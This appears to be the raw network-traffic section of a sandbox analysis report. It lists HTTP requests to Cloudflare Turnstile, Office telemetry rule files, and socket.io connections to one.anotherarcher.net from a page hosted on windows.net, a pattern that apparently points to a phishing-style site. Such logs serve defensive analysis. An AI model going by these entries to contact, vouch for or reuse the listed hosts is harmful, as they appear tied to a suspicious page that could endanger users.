Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd8c30aa36a5c&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/fkb2b/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd8c30aa36a5c&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/920432075:1727987543:H-hSCAuEwJhg3Sa_7UIzdahpD0yMy3z-ZDTfJupnFjk/8ccfd8a398d6423a/c5efb4b87836f3f HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBBdq HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/2028712932:1727987535:vTMwXPXw0zykXZtbjNHZNtvy4RmrOIsf0E8-IoNu6b4/8ccfd8c30aa36a5c/a8123a6ff98289a HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ccfd8c30aa36a5c/1727989071225/koUE2VzgxDp0QBM HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/fkb2b/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBBdq HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=m8JxNlLGe8TMyYeHAANm HTTP/1.1Host: one.anotherarcher.netConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: b3fG4Eu56Iv+y54V7+J3tA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBBtW&sid=m8JxNlLGe8TMyYeHAANm HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ccfd8c30aa36a5c/1727989071225/koUE2VzgxDp0QBM HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8ccfd8c30aa36a5c/1727989071228/35c0b3f0fe96f3b509617cfbbaf1b0b901a311209cfe749c4d8d11ae5856debf/opCncN-MWn-cQ2Z HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/fkb2b/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/oijse/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBCWU&sid=m8JxNlLGe8TMyYeHAANm HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBBtW&sid=m8JxNlLGe8TMyYeHAANm HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBBtU&sid=m8JxNlLGe8TMyYeHAANm HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd8e9a8628cba&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/oijse/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBCWU&sid=m8JxNlLGe8TMyYeHAANm HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBDCZ HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=PxklD2APRIAoLrLiAANp HTTP/1.1Host: one.anotherarcher.netConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: e91ohwNcEPbZpe1Ey3s3lg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/2028712932:1727987535:vTMwXPXw0zykXZtbjNHZNtvy4RmrOIsf0E8-IoNu6b4/8ccfd8c30aa36a5c/a8123a6ff98289a HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd8e9a8628cba&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBDYw&sid=PxklD2APRIAoLrLiAANp HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBDCZ HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/swj1h/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8ccfd8e9a8628cba/1727989079444/253f40cf42d646e339b2e3140a0826b0f42158c4cc3913d8a465619039bc9a49/_XGmbjnvTDaPaRY HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/oijse/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBDvc&sid=PxklD2APRIAoLrLiAANp HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
